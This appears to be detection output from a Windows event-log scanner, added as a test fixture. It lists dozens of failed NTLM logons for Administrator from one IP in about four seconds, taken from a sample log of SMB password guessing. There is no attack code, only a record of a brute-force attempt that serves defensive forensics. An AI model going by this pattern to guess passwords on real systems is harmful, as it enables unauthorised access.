+2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
